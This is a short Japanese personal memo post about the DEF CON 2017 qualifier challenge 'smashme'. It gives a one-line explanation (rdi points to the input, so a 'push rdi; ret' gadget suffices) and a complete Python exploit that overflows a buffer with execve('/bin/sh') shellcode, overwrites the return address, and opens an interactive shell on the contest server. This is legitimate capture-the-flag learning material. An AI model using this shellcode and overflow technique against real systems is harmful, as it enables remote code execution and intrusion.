birabiraのめも

忘れっぽいのでここにメモをしていきます

defcon 2017 smashme

先輩の教えと、後輩の気付きを横取りして解いた
rdiに入力値のの先頭アドレスがあったからpush rdi; ret;しただけ

import struct, socket, sys, telnetlib
 
def sock(remoteip, remoteport):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((remoteip, remoteport))
  return s
 
def read_until(f, delim='\n'):
  data = ''
  while not data.endswith(delim):
    data += f.read(1)
  return data
 
def shell(s):
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

p = lambda x: struct.pack("<L", x)

shellcode = "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"

payload  = shellcode
payload += "Smash me outside, how bout d"
payload += "A" * (72 - len(payload))
payload += p(0x42ef4e) #0x0042ef4e: push rdi ; ret  ;  (1 found)


s = sock("smashme_omgbabysfirst.quals.shallweplayaga.me",57348)
s.send(payload + "\n")

shell(s)